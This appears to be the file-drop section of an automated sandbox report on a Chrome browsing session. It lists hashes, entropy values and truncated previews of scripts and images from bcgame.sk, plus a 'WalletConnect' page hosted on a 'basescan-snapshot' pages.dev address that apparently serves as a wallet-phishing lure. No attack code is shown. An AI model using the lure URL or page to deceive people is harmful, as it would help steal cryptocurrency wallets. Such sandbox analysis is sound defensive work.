                                                                                                                                                                                                                                              Preview:!function(n,e,r,t,i,o,a,c,s){for(var u=s,f=0;f<document.scripts.length;f++)if(document.scripts[f].src.indexOf(o)>-1){u&&"no"===document.scripts[f].getAttribute("data-lazy")&&(u=!1);break}var p=[];function l(n){return"e"in n}function d(n){return"p"in n}function _(n){return"f"in n}var v=[];function y(n){u&&(l(n)||d(n)||_(n)&&n.f.indexOf("capture")>-1||_(n)&&n.f.indexOf("showReportDialog")>-1)&&m(),v.push(n)}function g(){y({e:[].slice.call(arguments)})}function h(n){y({p:n})}function E(){try{n.SENTRY_SDK_SOURCE="loader";var e=n[i],o=e.init;e.init=function(i){n.removeEventListener(r,g),n.removeEventListener(t,h);var a=c;for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(a[s]=i[s]);!function(n,e){var r=n.integrations||[];if(!Array.isArray(r))return;var t=r.map((function(n){return n.name}));n.tracesSampleRate&&-1===t.indexOf("BrowserTracing")&&(e.browserTracingIntegration?r.push(e.browserTracingIntegration({enableInp:!0})):e.BrowserTracing&&r.push(new e.BrowserTracing));(n.replaysSes
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1121)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1122
                                                                                                                                                                                                                                              Entropy (8bit):4.838259888275404
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:w0WRXW/AbI/zWWs+TWQSlVikeRGDP1jeu7XYwYUG8iRHXNYBpCkrM:wvRzs/6WdHSlUke8ZjJY1P8idXNYBpvg
                                                                                                                                                                                                                                              MD5:A255E18E124CAD6CD50F6E9F734537C7
                                                                                                                                                                                                                                              SHA1:B446CBA4FA1345A4DADC556C97339007B3A894E1
                                                                                                                                                                                                                                              SHA-256:3A5CF52FBB21118CE11BE33C6FCBEFFABDB8594C8BBD5E954D8E79D23AF8648B
                                                                                                                                                                                                                                              SHA-512:5FC2E05ACFA068C21F0D6935D4ECE6ECADCED7A89B8F5CF61FF4AB32F74FAD7CA12DA7A43700518B60D13707B564BAFD30E0962AA19C8AF1160B9DACBD81E20C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:s,Assets:t,ChildProperties:r,DOMElements:a,DelegatedEvents:n,Dynamic:i,ErrorBoundary:o,For:d,Hydration:l,HydrationScript:c,Index:g,Match:y,NoHydration:p,Portal:S,Properties:m,RequestContext:u,SVGElements:E,SVGNamespace:h,Show:v,Suspense:A,SuspenseList:H,Switch:N,addEventListener:P,assign:b,classList:x,className:D,clearDelegatedEvents:L,createComponent:M,delegateEvents:T,dynamicProperty:f,effect:C,escape:k,generateHydrationScript:w,getAssets:R,getHydrationKey:q,getNextElement:G,getNextMarker:K,getNextMatch:O,getOwner:V,getPropAlias:_,getRequestEvent:j,hydrate:B,innerHTML:F,insert:I,isDev:z,isServer:J,memo:Q,mergeProps:U,render:W,renderToStream:X,renderToString:Y,renderToStringAsync:Z,resolveSSRNode:$,runHydrationEvents:ee,setAttribute:se,setAttributeNS:te,setProperty:re,spread:ae,ssr:ne,ssrAttribute:ie,ssrClassList:oe,ssrElement:de,ssrHydrationKey:le,ssrSpread:ce,ssrStyle:ge,style:ye,template:pe,untrack:Se,use:me,useAssets:ue}=e.h0lnfr;export{i as D,S as
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):102
                                                                                                                                                                                                                                              Entropy (8bit):4.603202452431829
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQLeX0axAJDOVAoXN/GzkXXEDUGXseXBF/FEZCMYwn:AeCVAKN/nHEDUGXseb+ZCMYwn
                                                                                                                                                                                                                                              MD5:939CC827F6BA302E0F81F34B9E1C8F8B
                                                                                                                                                                                                                                              SHA1:6A18F9FD5F73AA9B8E18BE37160F70266289C70A
                                                                                                                                                                                                                                              SHA-256:56C93410C118BAB095E6A3DFC0B6291B68932F0E8F0154CF569199FA19DE0CAE
                                                                                                                                                                                                                                              SHA-512:C08D5316656DF6A95165B6836F60F06AEB0ECD7FC9002478E4E3F53B3FAD05FA34C01FE875B7D4DB0222F68E5FFD1AC74769CFE3F4320F853841EE5E82BC7E84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/isArray-79a0be9c.js
                                                                                                                                                                                                                                              Preview:function i(r){return r!=null&&typeof r=="object"}var a=Array.isArray;const s=a;export{i as a,s as i};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 387 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):28252
                                                                                                                                                                                                                                              Entropy (8bit):7.8622048805343
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RvWx3Itqn+EKd/eLnkzJgca0svVvK4H34NyCC88Yxw2O:8x3oqn+EKdGQpZsvVvhX4IC91VO
                                                                                                                                                                                                                                              MD5:7169A33930E9A76592047633021C3F6F
                                                                                                                                                                                                                                              SHA1:8DF032C5460D0B033DCB78F2CF5374ABDC4A0BC5
                                                                                                                                                                                                                                              SHA-256:20B3485EAEBDE1F3546A9BA385EE6A11E31F7A0BB1B6536C7805B512876714BA
                                                                                                                                                                                                                                              SHA-512:B5C1DD04B42F43EABDF6D3156B0E52AD63853240E5CB28BB817DAD1E20AA3C037FFE4E67106F9EDB386B5204B5463BE106BC6E90A7C3B6A65466F7B9F8E312BA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............~.C....PLTE..o..kXZP.._{vZ..^UXL..a..j..enlU..rwsY..o{vZ..i..q..j..b^`R..e..m..i..l..p.....o..m..p.._..c..h..o..j..k..kpsi..stpX..q..n..a[]N..pkhT..m..g..l..g.|];EE.....................|..Y`anwx......irt..............................|.w..................z................................`cX..m..p..kBEI..`..e..q.z\..p..r..p..r..q..p..r..q..s...>FGAHI<CD<AB=CD:CD<AB;BC<BC:AB:BC@EI9?@>FF;BB@DH8?@>FF:BB>EE8?A<CC:@A:AB<DD8>A<CC:@A;CF:AB;BB9@B:DD9>B;BC:AA;BE:AB>CD:AB;AC9?A:CC:AB;BB;AB:AB;BC:AC=CE9AB:AB:BB:AB:AA;BC9@A;AB8?A:BC:AB:@A:BC9?A:AB:AB:AB<AB8@@:@B:CC7??6=>5;<5;<4:;;CC<BC:AB8@@:@B:BC9@A:AB:AB..q..n|wZ..h..q..n..c..p..j..g..r..^.}]..k..h..p..r..s..s..s}x[..r..rjk`..ndgX............t|.qzz.......p......tRNS.EkbqL{..Q.E.By.a:p.....y~.P]j.vtc%.J.f@.X....Y0.a.n..gX?K..R...]k.O.{..1.D.d.>Z...S7.r.5...#JX.=..F...................... !"$$&'())*+,,.011234456889:;<>?@BBDFGIKKMMOPRSTUWYZZ[\[WUSP_]]^_abceeY.*.l0.O?.68qS.....?..*.0...|CG..s..i..jsIDATx...}...A......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                              Entropy (8bit):4.933115570682282
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:X5eNcBWFXMOYEBAP5egtIzVWRwHjXJqIK+qIKzg0fUsq5eK:pemBkXWegazdDZq3+q3c08sceK
                                                                                                                                                                                                                                              MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                                                                                              SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                                                                                              SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                                                                                              SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://accounts.google.com/gsi/style
                                                                                                                                                                                                                                              Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5860)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5861
                                                                                                                                                                                                                                              Entropy (8bit):5.440993735176134
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:6TV0GjhEzRIwp+5dWdcfpEI84kvv6sQ5HHfqHX+SnzEvi46aNW9tt494jy37xrs:6TV0GjhaRhYpEI84kKsQVqHX+SnEzwPT
                                                                                                                                                                                                                                              MD5:D9A4FA1B8614AC459B5363C6B4141161
                                                                                                                                                                                                                                              SHA1:D01FCF983FC66496DF89C7E0E631EFF953751C2A
                                                                                                                                                                                                                                              SHA-256:62977C41114ECA815DCF72C9B9176737D9E1404B9B42E2D6995B03EAF20E8E32
                                                                                                                                                                                                                                              SHA-512:87D8698AECB55948097A0173B58B360C4C3D78CFF29C45E0C4EEF7BB1CAA7AB12CFBAA48E6063BF67BF6BEE5B586FE7B025B9654EF1940874D5373E59E4AA331
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var G=Object.defineProperty,H=Object.defineProperties;var W=Object.getOwnPropertyDescriptors;var T=Object.getOwnPropertySymbols;var J=Object.prototype.hasOwnProperty,K=Object.prototype.propertyIsEnumerable;var D=(e,r,a)=>r in e?G(e,r,{enumerable:!0,configurable:!0,writable:!0,value:a}):e[r]=a,w=(e,r)=>{for(var a in r||(r={}))J.call(r,a)&&D(e,a,r[a]);if(T)for(var a of T(r))K.call(r,a)&&D(e,a,r[a]);return e},$=(e,r)=>H(e,W(r));var E=(e,r,a)=>new Promise((s,m)=>{var u=i=>{try{g(a.next(i))}catch(t){m(t)}},b=i=>{try{g(a.throw(i))}catch(t){m(t)}},g=i=>i.done?s(i.value):Promise.resolve(i.value).then(u,b);g((a=a.apply(e,r)).next())});import{b as Q,g as X,c as d,S as R,i as o,a as k,t as h,d as N,q as Y,k as Z,n as ee,h as te,p as ae}from"./solid-js-8ff414d5.js";import{u as ie}from"./currency-47f1b68e.js";import{r as P,c as S}from"./index-1cecafc8.js";import{c as re}from"./CountryAvatar-04e11269.js";import{e as f,g as le,h as ne,M as se,u as oe,c as ce,y as de,i as z,B as me,d as ge,s as ue}fro
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65446), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):107749
                                                                                                                                                                                                                                              Entropy (8bit):4.986561530165959
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:u7/cnTfIbdDSRjlJTQPWVTagPShkMnJuxlk6WRIvQEtUK9G2CWKeYcftIougRuOk:uLd2oe9G2CWPtmK4Y3OFnG7KokA98J
                                                                                                                                                                                                                                              MD5:AA2460E638343A1C2E585B37C228772A
                                                                                                                                                                                                                                              SHA1:2D88F1D758611DE7375C6BB4EB9E70DE5FCAFD77
                                                                                                                                                                                                                                              SHA-256:528A1886F07E7777A6EE359F49155202A3CA8670E7F8FEB399CA186A8BF80AC6
                                                                                                                                                                                                                                              SHA-512:3EC06A5E6B1CB03015FF1991413793A9F844D4095A35899A7F6E2065DB9D486DFA4FBF31D575F9B937958A334F555825FBFB3EF53E832965539AF38FAA8CCFF1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */..!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (C, e) { "use strict"; var t = [], r = Object.getPrototypeOf, s = t.slice, g = t.flat ? function (e) { return t.flat.call(e) } : function (e) { return t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, x = function (e) { return null != e && e === e.window }, E = C.document, c = { type: !0, src: !0, nonce: !0, noModule: !0 }; function b(e, t, n) { var r, i, o = (n = n || E).createElement("sc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5563)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5564
                                                                                                                                                                                                                                              Entropy (8bit):5.525278571610317
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zr0yUPBdtsKyqdorqLNdG9kT/vrEjtGfAIvr8YOVzV1oC05TMkJnt9gokUMx4TBX:zYPBdtTyqdWqLK9W/TEjtGfAIT8xh4CW
                                                                                                                                                                                                                                              MD5:834AC674922D570C5AF40C02D527D24C
                                                                                                                                                                                                                                              SHA1:39C1C1EBB9194B2380E3541297915C208DCFFFE9
                                                                                                                                                                                                                                              SHA-256:843FF8E21328C5CECE0D0DA2159CDDC13BF290C583D0A4400F3B66F604CEB268
                                                                                                                                                                                                                                              SHA-512:E2D5CF02E7E3FD5CBF15D12172C29691513889748D9E5C54D3271991EE4145A2F683BEE5F0CF25B2BA28E6D42A8636B335711AD5C4277B4B18A02E5784AD6ADB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/UnableLogin-924f35fd.js
                                                                                                                                                                                                                                              Preview:var c=(e,n,t)=>new Promise((s,o)=>{var l=i=>{try{a(t.next(i))}catch(d){o(d)}},u=i=>{try{a(t.throw(i))}catch(d){o(d)}},a=i=>i.done?s(i.value):Promise.resolve(i.value).then(l,u);a((t=t.apply(e,n)).next())});import{e as h,b as x,g as m,d as w,P as $,B as S,p as C}from"./manifest-e71017e8.js";import{t as L}from"./toInteger-d3049371.js";import{d as k,c as p,i as r,g as E,t as _}from"./web-170e0195.js";import{t as g,T as U}from"./i18n-78ff9edb.js";var T="Expected a function";function O(e,n){var t;if(typeof n!="function")throw new TypeError(T);return e=L(e),function(){return--e>0&&(t=n.apply(this,arguments)),e<=1&&(n=void 0),t}}function I(e){return O(2,e)}const B="36897522347-1antasd8i7pbd033gmrf2lreff59c754.apps.googleusercontent.com",R=I(()=>x.loadScript("https://accounts.google.com/gsi/client")),K=()=>{const e=document.querySelector(".custom-google-button");if(e)return{click:()=>{e&&e.click()}};const n=document.createElement("div");n.style.display="none",n.classList.add("custom-google-butt
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (19931), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):19931
                                                                                                                                                                                                                                              Entropy (8bit):5.680457746875887
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:WRQ2kvcAAdTRhQLThP2yO9/9G84U5xOiKQYHHHsglDep9m1TfB8EKLMyA+LyUyy9:xThP2V/9N4U/gQYPXP8jAPLyrZ
                                                                                                                                                                                                                                              MD5:4BAF1850C9A72CBF72B60EE77F226E28
                                                                                                                                                                                                                                              SHA1:C5ABE8FDC43EFDBD8422BCE62037C19824B8F8DF
                                                                                                                                                                                                                                              SHA-256:4F7EC08FECCCB8FD7E7F49C1B85040532A1FC9CFB060669FA6F39B04F03090F4
                                                                                                                                                                                                                                              SHA-512:32D37EF080A9A815E7AD43185F2925AAF2D306FE82795D859205718E77F526D5AAF15FD7FBEDF1BB0D4E34A5966097325C0313448E34EE36600727E883016937
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var QRCode;!function(){function a(a){this.mode=c.MODE_8BIT_BYTE,this.data=a,this.parsedData=[];for(var b=[],d=0,e=this.data.length;e>d;d++){var f=this.data.charCodeAt(d);f>65536?(b[0]=240|(1835008&f)>>>18,b[1]=128|(258048&f)>>>12,b[2]=128|(4032&f)>>>6,b[3]=128|63&f):f>2048?(b[0]=224|(61440&f)>>>12,b[1]=128|(4032&f)>>>6,b[2]=128|63&f):f>128?(b[0]=192|(1984&f)>>>6,b[1]=128|63&f):b[0]=f,this.parsedData=this.parsedData.concat(b)}this.parsedData.length!=this.data.length&&(this.parsedData.unshift(191),this.parsedData.unshift(187),this.parsedData.unshift(239))}function b(a,b){this.typeNumber=a,this.errorCorrectLevel=b,this.modules=null,this.moduleCount=0,this.dataCache=null,this.dataList=[]}function i(a,b){if(void 0==a.length)throw new Error(a.length+"/"+b);for(var c=0;c<a.length&&0==a[c];)c++;this.num=new Array(a.length-c+b);for(var d=0;d<a.length-c;d++)this.num[d]=a[d+c]}function j(a,b){this.totalCount=a,this.dataCount=b}function k(){this.buffer=[],this.length=0}function m(){return"undefine
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):160113
                                                                                                                                                                                                                                              Entropy (8bit):7.997433786621312
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:WTpzqzgDY7vN5FqAFnLfLexHhfMVAHrkZCYNf36VNjiB:WTpzqMDsvLFqAFL4Bfjrm/tcNo
                                                                                                                                                                                                                                              MD5:539AA9F3ED7318B20AADB74F0CAC80DF
                                                                                                                                                                                                                                              SHA1:7E25B3E81DE3F76D8E8473AF1E0DD5CD3B69BE6D
                                                                                                                                                                                                                                              SHA-256:95565E51FA666ED6AB90F54117B403293E5092F4680A5312A96489DC860DDE94
                                                                                                                                                                                                                                              SHA-512:65B3D2E6BCC90F694A07BFC7796E8EE9B337F7A7171CD54DE71C811024C948D423EE5E531633077D1CA97E7CB987B800DF787B49A26019427184DF82EFD0D796
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/sports-C-mawjC1.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../?..........{8_n...-R.-....$i..d..s.p'"....ER.g..y..m.i....R..~..w>......D..7..d..PqX...3.[.#..tT.m..*Dq...........K#.BV._u^.Z.....`..V.............A.`CAT..t.d.bR.P..>W..,E.*.S....A..m`.J.l..W...P.U..e..Y..!.u...7&u@..n.c}2.<........!.6$......TO..q.%F..7.|,.R..`..}.;m...N%... ...w....".3%1..h......W...D".`..^......Kn...3............WaB0....k...[p.(S..(.IS.......H_..Y.}&.`.#....w3*!....>.Z.s..QplB.,.........(,4....7p,.....T..+....,.O.7....%.u...:....R...=.[U......lw..5......d..@|..O7..~.S.p_....e...J......._......F?..e...rsw_.=:.>c...L6\.....<.....5+b............RV.Q...oko.:....}.~..z<.[v.87...U.....$.....y.>.S.$......;..wy..6e...........gzV.$..$I.....Bew.z...`..}!.J.....F8...vS3_0 ..E..z.T....]..*...j7!*......r&.'.#.m53....7+6=..w.`f..^.]i......J.T)....<t...s.3.a:2.e...:..hj.tX...8...H.9.M...3.!.J]dN...z.R...9.KW.....s3h.v...&.^b(..yI..O6~............O....R4{2..uF.$H6..A!.)0...I.!.......EA..+K.4.3...Y.g_..(..r..u}..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9113), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9113
                                                                                                                                                                                                                                              Entropy (8bit):5.300576191647459
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zGN3RX3rXSuy8Zcsy6EEk9e7/2NbfmUw9TwYoNwmjctII4Bze:i+uy8ZcEEt94/2Nbff83HBt4Bze
                                                                                                                                                                                                                                              MD5:5C8F4A46A21DFF724A763101B646B4F3
                                                                                                                                                                                                                                              SHA1:FBE7C978E0C99D1A22BE935D266DA915A2D400B0
                                                                                                                                                                                                                                              SHA-256:A2BE364E2921857C3E1415E1E9E74E5628A02318662A25DA27A23DA90929C84A
                                                                                                                                                                                                                                              SHA-512:AE0EA77EF19A92124DBAED732D5181A06C54CF696E96A8DD65AF90E0B5FBD62919901E3E3B4F405350057A2F6F9633E5E93E76F5D932FDE9CB988CFFAEF745DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:window.blue={},window.blue.isMobileDetected=function(){return!!(navigator.userAgent.match(/Android/i)||navigator.userAgent.match(/webOS/i)||navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPad/i)||navigator.userAgent.match(/iPod/i)||navigator.userAgent.match(/BlackBerry/i)||navigator.userAgent.match(/Windows Phone/i))},window.blue.isFirefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1,window.console||(console={log:function(){}}),function(e,t){e=e||"docReady",t=t||window;var n=[],o=!1,r=!1;function u(){if(!o){o=!0;for(var e=0;e<n.length;e++)n[e].fn.call(window,n[e].ctx);n=[]}}function a(){("complete"===document.readyState||"interactive"===document.readyState)&&u()}t[e]=function(e,t){if("function"!=typeof e)throw TypeError("callback for docReady(fn) must be a function");if(o){setTimeout(function(){e(t)},1);return}n.push({fn:e,ctx:t}),"complete"===document.readyState||"interactive"===document.readyState?setTimeout(u,1):r||(document.addEventListener?(document.ad
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1642)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2048
                                                                                                                                                                                                                                              Entropy (8bit):4.886762545251135
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9tC4Us/SE8XOOHM0v2tJV6mlq/AbZPUN0SkGSOo:Dos/STXOOs22tz6mmQZPKDE7
                                                                                                                                                                                                                                              MD5:BB2C85890FBC43EB00D54A814058C3B1
                                                                                                                                                                                                                                              SHA1:15FD820F705252A655576464961B08BDC110619A
                                                                                                                                                                                                                                              SHA-256:72E7C8E5913668ACA3804CED58F07497C8C326830604BC8A3A7A2057F75123AB
